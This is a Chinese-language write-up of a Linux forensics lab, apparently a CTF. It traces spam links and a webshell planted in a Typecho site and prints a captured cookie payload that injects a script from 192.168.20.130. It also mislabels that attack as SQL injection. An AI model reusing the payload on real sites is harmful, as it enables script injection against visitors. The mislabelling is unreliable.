第五章 linux实战-黑链

finalshell通过ssh连接linux机器

1.找到黑链添加在哪个文件 flag 格式 flag{xxx.xxx}

执行查找命令

grep -rnw '/var/www/html/' -e '黑链'

代码分析

以下是对"grep -rnw '/var/www/html/' -e '黑链'"这段代码的分析：

一、整体功能

这段代码使用 grep 命令在指定的目录 /var/www/html/ 中搜索包含特定字符串"黑链"的内容。

二、参数解释

• -r：递归搜索，即对指定目录及其子目录中的所有文件进行搜索。

• -n：在输出结果中显示匹配行的行号。

• -w：只匹配整个单词，确保搜索的"黑链"不是其他单词的一部分。

• /var/www/html/：指定要搜索的目录路径。

• -e '黑链'：指定要搜索的模式为"黑链"。

三、用途

主要用于查找可能存在的恶意黑链。在网站安全检查中，如果在 /var/www/html/ 目录下的网页文件中发现了"黑链"字样，可能意味着网站被黑客入侵并植入了非法链接，以便及时采取措施进行清理和修复，保障网站的安全和正常运行。

flag

flag{header.php}

2.webshell的绝对路径 flag{xxxx/xxx/xxx/xxx/}

下载html文件夹

使用D盾查杀

找到webshell后门文件特征（$_POST）

flag

flag{/var/www/html/usr/themes/default/404.php}

3.黑客注入黑链文件的 md5 md5sum file flag{md5}

打开可疑文件所在位置

发现黑链文件

执行MD5编码命令

 certutil -hashfile .\poc1.js MD5

代码分析

以下是对"certutil -hashfile.\poc1.js MD5"这段代码的分析：

一、整体功能

这段代码使用 certutil 命令来计算指定文件（这里是当前目录下的"poc1.js"文件）的 MD5 哈希值。

二、参数解释

• -hashfile：表示对指定文件进行哈希计算。

• .\poc1.js：指定要计算哈希值的文件路径，这里是当前目录下的"poc1.js"文件。

• MD5：指定要计算的哈希算法为 MD5。

三、用途

1. 完整性校验：可以用于验证文件在传输或存储过程中是否被篡改。如果文件的 MD5 哈希值与预期的哈希值不同，那么文件很可能已经被修改。

2. 识别重复文件：不同的文件通常具有不同的 MD5 哈希值，所以可以通过比较文件的 MD5 哈希值来判断两个文件是否相同。

3. 安全检查：在某些安全场景下，通过计算文件的哈希值可以帮助检测恶意软件或非法修改的文件。

flag

flag{10c18029294fdec7b6ddab76d9367c14}

4.攻击入口是哪里？url请求路径，最后面加/ flag{/xxxx.xxx/xxxx/x/}

wireshark分析pacp文件

执行查找命令

http contains "poc1.js"

代码分析

以下是对"http contains "poc1.js""的分析：

一、整体含义

这可能是一个用于分析 HTTP 流量的过滤条件或搜索表达式。

二、具体解释

"http"通常代表与 HTTP 协议相关的内容，在这里可能指的是 HTTP 请求、响应或者是 HTTP 通信的日志等。"contains"表示包含的意思，后面的""poc1.js""是一个特定的字符串。

三、用途场景

1. 网络安全分析：在网络流量监测中，使用这个表达式可以快速筛选出包含特定文件名"poc1.js"的 HTTP 通信。这可能有助于检测潜在的恶意软件传播或异常的文件访问行为。例如，如果发现大量不明来源的 HTTP 请求中包含"poc1.js"，可能暗示着有针对性的攻击活动。

2. 故障排查：在排查网络应用故障时，如果知道某个特定的脚本文件"poc1.js"可能与问题相关，通过这个表达式可以在大量的 HTTP 日志中快速定位到与该文件有关的通信记录，以便进一步分析问题的根源。

3. 性能优化：对于大型的网络应用，分析 HTTP 流量中特定文件的请求情况可以帮助优化资源加载策略。如果发现"poc1.js"文件的请求频率很高或者响应时间较长，可以考虑对该文件进行优化，如压缩、缓存或者优化服务器配置以提高响应速度。

找到可疑cookie，根据关键词得知这是SQL注入

对该cookie进行url解码

https://www.sojson.com/encodeurl.html
09f1f9758c26c309477b55f3a4bac8de__typecho_remember_url=http%3A%2F%2Fxxx.xxx.com%2F%22%3E%3C%2Fa%3E%3Cscript%2Fsrc%3Dhttp%3A%2F%2F192.168.20.130%2Fpoc1.js%3E%3C%2Fscript%3E%3Ca%2Fhref%3D%22%23

确定flag为

flag

flag{/index.php/archives/1/}